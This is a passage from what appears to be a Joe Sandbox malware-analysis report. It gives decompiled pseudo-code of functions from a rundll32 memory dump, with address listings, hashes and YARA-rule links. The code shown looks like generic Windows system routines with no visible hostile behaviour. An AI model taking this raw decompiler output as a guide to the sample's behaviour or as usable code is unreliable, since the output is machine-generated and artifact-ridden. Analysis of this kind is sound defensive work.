				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x46cd360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E0461D0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E045F2280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L045F4620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E0461F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E045EFFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x46cb1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E0461B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}































































                                                                                            0x04605142
                                                                                            0x0460514c
                                                                                            0x04605150
                                                                                            0x04605157
                                                                                            0x04605159
                                                                                            0x0460515e
                                                                                            0x04605165
                                                                                            0x04605169
                                                                                            0x0460516c
                                                                                            0x04605172
                                                                                            0x04605176
                                                                                            0x0460517a
                                                                                            0x0460517a
                                                                                            0x0460517a
                                                                                            0x0460517f
                                                                                            0x04646d8b
                                                                                            0x04646d8e
                                                                                            0x04646d91
                                                                                            0x04646d95
                                                                                            0x04646d98
                                                                                            0x04646d9c
                                                                                            0x04646da0
                                                                                            0x04646da3
                                                                                            0x04646da7
                                                                                            0x04646e26
                                                                                            0x04646e26
                                                                                            0x04646e2a
                                                                                            0x046051f9
                                                                                            0x046051f9
                                                                                            0x046051fe
                                                                                            0x04646e33
                                                                                            0x04646e33
                                                                                            0x04646e39
                                                                                            0x04646e3d
                                                                                            0x04646e46
                                                                                            0x04646e50
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04646e52
                                                                                            0x04646e53
                                                                                            0x04646e56
                                                                                            0x04646e5d
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04646e5f
                                                                                            0x04646e67
                                                                                            0x04646e77
                                                                                            0x04646e7f
                                                                                            0x04646e80
                                                                                            0x04646e88
                                                                                            0x04646e90
                                                                                            0x04646e9f
                                                                                            0x04646ea5
                                                                                            0x04646ea9
                                                                                            0x04646eb1
                                                                                            0x04646ebf
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04646ecf
                                                                                            0x04646ed3
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04646edb
                                                                                            0x04646ede
                                                                                            0x04646ee1
                                                                                            0x04646ee8
                                                                                            0x04646eeb
                                                                                            0x04646eed
                                                                                            0x04646ef0
                                                                                            0x04646ef4
                                                                                            0x04646ef8
                                                                                            0x04646efc
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04646f0d
                                                                                            0x04646f11
                                                                                            0x04646f32
                                                                                            0x04646f37
                                                                                            0x04646f3b
                                                                                            0x04646f3e
                                                                                            0x04646f41
                                                                                            0x04646f46
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04646f4c
                                                                                            0x04646f50
                                                                                            0x04646f50
                                                                                            0x04646f54
                                                                                            0x04646f62
                                                                                            0x04646f65
                                                                                            0x04646f6d
                                                                                            0x04646f7b
                                                                                            0x04646f7b
                                                                                            0x04646f93
                                                                                            0x04646f98
                                                                                            0x04646fa0
                                                                                            0x04646fa6
                                                                                            0x04646fb3
                                                                                            0x04646fb6
                                                                                            0x04646fbf
                                                                                            0x04646fc1
                                                                                            0x04646fd5
                                                                                            0x04646fda
                                                                                            0x04646fda
                                                                                            0x04646fdd
                                                                                            0x04646fe2
                                                                                            0x04646fe7
                                                                                            0x04646feb
                                                                                            0x04646fef
                                                                                            0x04646ff3
                                                                                            0x0460520c
                                                                                            0x0460520c
                                                                                            0x0460520f
                                                                                            0x04605215
                                                                                            0x04605234
                                                                                            0x0460523a
                                                                                            0x0460523a
                                                                                            0x04605244
                                                                                            0x04605245
                                                                                            0x04605246
                                                                                            0x04605251
                                                                                            0x04605251
                                                                                            0x04646f13
                                                                                            0x04646f17
                                                                                            0x04646f17
                                                                                            0x04646f18
                                                                                            0x04646f1b
                                                                                            0x04646f1f
                                                                                            0x04646f23
                                                                                            0x00000000
                                                                                            0x04646f28
                                                                                            0x04605204
                                                                                            0x04605204
                                                                                            0x04605208
                                                                                            0x00000000
                                                                                            0x04605208
                                                                                            0x04605185
                                                                                            0x04605188
                                                                                            0x0460518a
                                                                                            0x0460518e
                                                                                            0x04605195
                                                                                            0x04646db1
                                                                                            0x04646db5
                                                                                            0x04646db9
                                                                                            0x0460519b
                                                                                            0x0460519b
                                                                                            0x0460519e
                                                                                            0x046051a7
                                                                                            0x046051a9
                                                                                            0x046051a9
                                                                                            0x046051b5
                                                                                            0x046051b8
                                                                                            0x046051bb
                                                                                            0x046051be
                                                                                            0x046051c1
                                                                                            0x046051c5
                                                                                            0x046051c9
                                                                                            0x046051cd
                                                                                            0x046051cd
                                                                                            0x046051d8
                                                                                            0x046051dc
                                                                                            0x046051e0
                                                                                            0x04646dcc
                                                                                            0x04646dd0
                                                                                            0x04646dd5
                                                                                            0x04646ddd
                                                                                            0x04646de1
                                                                                            0x04646de1
                                                                                            0x04646de5
                                                                                            0x04646deb
                                                                                            0x04646df1
                                                                                            0x04646df7
                                                                                            0x04646dfd
                                                                                            0x04646e01
                                                                                            0x04646e05
                                                                                            0x04646e09
                                                                                            0x04646e0d
                                                                                            0x04646e11
                                                                                            0x04646e11
                                                                                            0x046051eb
                                                                                            0x04646e1a
                                                                                            0x04646e1f
                                                                                            0x04646e21
                                                                                            0x04646e23
                                                                                            0x00000000
                                                                                            0x046051f1
                                                                                            0x046051f1
                                                                                            0x00000000
                                                                                            0x046051f1

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: fb234aac2c11dd14063d2574a4fdc6d476c3987d1b429d3eb721c570997846cd
                                                                                            • Instruction ID: d1c2119b99573705864d0776c3b39d0c9e715a3c160306cd3ecf50660cc7fc61
                                                                                            • Opcode Fuzzy Hash: fb234aac2c11dd14063d2574a4fdc6d476c3987d1b429d3eb721c570997846cd
                                                                                            • Instruction Fuzzy Hash: A2C133756083809FD754CF28C480A5AFBE1BF89308F14896EF9998B392E775E945CF42
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 046003E2 Relevance: .3, Instructions: 254COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 74%
                                                                                            			E046003E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x46cd360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E04600548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E0461B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E045EB02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x46c7c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E045F7D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E045F7D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E04657016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E04619830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E046569A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x46c7c04 != 0) {
						_t118 = _v12;
						_t120 = E0465A7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x46c7bd8;
						if( *0x46c7bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E046195D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E046199A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E04653540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E045DB1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E0461AAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x46c8474 - 3;
										if( *0x46c8474 != 3) {
											 *0x46c79dc =  *0x46c79dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E045F7D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E045F7D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E04657016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x46c8708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x46c7b00; // 0x0
							asm("ror esi, cl");
							 *0x46cb1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E046195D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E045E7F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}








































                                                                                            0x046003f1
                                                                                            0x046003f7
                                                                                            0x046003f9
                                                                                            0x046003fb
                                                                                            0x046003fd
                                                                                            0x04600400
                                                                                            0x0460040a
                                                                                            0x04644c7a
                                                                                            0x04600537
                                                                                            0x04600547
                                                                                            0x04600410
                                                                                            0x04600410
                                                                                            0x04600414
                                                                                            0x04600417
                                                                                            0x0460041a
                                                                                            0x04600421
                                                                                            0x04600424
                                                                                            0x0460042b
                                                                                            0x0460043b
                                                                                            0x0460043e
                                                                                            0x0460043f
                                                                                            0x0460043f
                                                                                            0x04600446
                                                                                            0x04600449
                                                                                            0x0460044c
                                                                                            0x0460044f
                                                                                            0x04600459
                                                                                            0x04644c8d
                                                                                            0x0460045f
                                                                                            0x0460045f
                                                                                            0x0460045f
                                                                                            0x04600467
                                                                                            0x04644c97
                                                                                            0x04644c9d
                                                                                            0x04644ca4
                                                                                            0x04644caa
                                                                                            0x04644caf
                                                                                            0x04644cb1
                                                                                            0x04644cc3
                                                                                            0x04644cb3
                                                                                            0x04644cbc
                                                                                            0x04644cbc
                                                                                            0x04644cc8
                                                                                            0x04644ccb
                                                                                            0x04644cd7
                                                                                            0x04644cda
                                                                                            0x04644cdf
                                                                                            0x04644cdf
                                                                                            0x04644ccb
                                                                                            0x04644ca4
                                                                                            0x0460046d
                                                                                            0x0460046f
                                                                                            0x0460046f
                                                                                            0x04600471
                                                                                            0x04600476
                                                                                            0x0460047a
                                                                                            0x0460047b
                                                                                            0x04600483
                                                                                            0x04600489
                                                                                            0x0460048d
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04644ce9
                                                                                            0x04644cef
                                                                                            0x04644d22
                                                                                            0x04644d22
                                                                                            0x00000000
                                                                                            0x04644d22
                                                                                            0x04644cf1
                                                                                            0x04644cf7
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04644cf9
                                                                                            0x04644cff
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04644d05
                                                                                            0x04644d07
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04644d0d
                                                                                            0x04644d0f
                                                                                            0x04644d14
                                                                                            0x04644d16
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04644d1c
                                                                                            0x04644d1c
                                                                                            0x04600499
                                                                                            0x04600535
                                                                                            0x04600535
                                                                                            0x00000000
                                                                                            0x04600535
                                                                                            0x046004a6
                                                                                            0x04644d2c
                                                                                            0x04644d37
                                                                                            0x04644d39
                                                                                            0x04644d3b
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04644d41
                                                                                            0x04644d48
                                                                                            0x04600527
                                                                                            0x0460052b
                                                                                            0x0460052d
                                                                                            0x04600530
                                                                                            0x04600530
                                                                                            0x00000000
                                                                                            0x0460052b
                                                                                            0x04644d4e
                                                                                            0x046004ac
                                                                                            0x046004ac
                                                                                            0x046004af
                                                                                            0x046004b2
                                                                                            0x046004b7
                                                                                            0x046004b9
                                                                                            0x046004bb
                                                                                            0x046004bd
                                                                                            0x046004bf
                                                                                            0x046004c5
                                                                                            0x046004c9
                                                                                            0x04644d53
                                                                                            0x04644d59
                                                                                            0x04644db9
                                                                                            0x04644dba
                                                                                            0x04644dbf
                                                                                            0x04644dc2
                                                                                            0x04644dc4
                                                                                            0x04644dc7
                                                                                            0x04644dce
                                                                                            0x00000000
                                                                                            0x04644dce
                                                                                            0x04644d5b
                                                                                            0x04644d61
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04644d63
                                                                                            0x04644d69
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04644d6b
                                                                                            0x04644d6e
                                                                                            0x04644d74
                                                                                            0x04644d76
                                                                                            0x04644d7c
                                                                                            0x04644d7e
                                                                                            0x04644d84
                                                                                            0x04644d89
                                                                                            0x04644d8c
                                                                                            0x04644d8d
                                                                                            0x04644d92
                                                                                            0x04644d95
                                                                                            0x04644d96
                                                                                            0x04644d98
                                                                                            0x04644d9a
                                                                                            0x04644d9f
                                                                                            0x04644da4
                                                                                            0x04644da6
                                                                                            0x04644da8
                                                                                            0x04644daf
                                                                                            0x04644db1
                                                                                            0x04644db1
                                                                                            0x04644daf
                                                                                            0x04644da6
                                                                                            0x04644d84
                                                                                            0x04644d7c
                                                                                            0x00000000
                                                                                            0x04644d74
                                                                                            0x046004d6
                                                                                            0x04644de1
                                                                                            0x046004dc
                                                                                            0x046004dc
                                                                                            0x046004dc
                                                                                            0x046004e4
                                                                                            0x04644deb
                                                                                            0x04644df1
                                                                                            0x04644df8
                                                                                            0x04644dfe
                                                                                            0x04644e03
                                                                                            0x04644e05
                                                                                            0x04644e17
                                                                                            0x04644e07
                                                                                            0x04644e10
                                                                                            0x04644e10
                                                                                            0x04644e1c
                                                                                            0x04644e1f
                                                                                            0x04644e35
                                                                                            0x04644e35
                                                                                            0x04644e1f
                                                                                            0x04644df8
                                                                                            0x046004f1
                                                                                            0x046004fa
                                                                                            0x04644e3f
                                                                                            0x04644e47
                                                                                            0x04644e5b
                                                                                            0x04644e61
                                                                                            0x04644e67
                                                                                            0x04644e69
                                                                                            0x04644e71
                                                                                            0x04644e73
                                                                                            0x04600500
                                                                                            0x04600500
                                                                                            0x04600500
                                                                                            0x046004fa
                                                                                            0x04600508
                                                                                            0x0460051d
                                                                                            0x0460051d
                                                                                            0x0460051f
                                                                                            0x04600524
                                                                                            0x00000000
                                                                                            0x04600524
                                                                                            0x04600515
                                                                                            0x04600517
                                                                                            0x04644e7a
                                                                                            0x04644e7c
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04644e85
                                                                                            0x00000000
                                                                                            0x04644e85
                                                                                            0x00000000
                                                                                            0x04600517

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 41e0de8db2d403f0d00caa3eb2354b02970d423523b3d1ba2a4a76be9a85734d
                                                                                            • Instruction ID: ed6f308180ed34892525d4ac8eb05c3dc9fffe411e3b759ee6d50effcf9d8723
                                                                                            • Opcode Fuzzy Hash: 41e0de8db2d403f0d00caa3eb2354b02970d423523b3d1ba2a4a76be9a85734d
                                                                                            • Instruction Fuzzy Hash: B8914371E00255AFEF259F68D845BAE7BA0EB45728F054266E910AB3E1FB34BD00C785
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 045DC600 Relevance: .2, Instructions: 225COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 67%
                                                                                            			E045DC600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x46cd360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E045E6D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E0461B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x46c7b9c; // 0x0
					_t74 = L045F4620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E04619650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L045F77F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E0461F3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
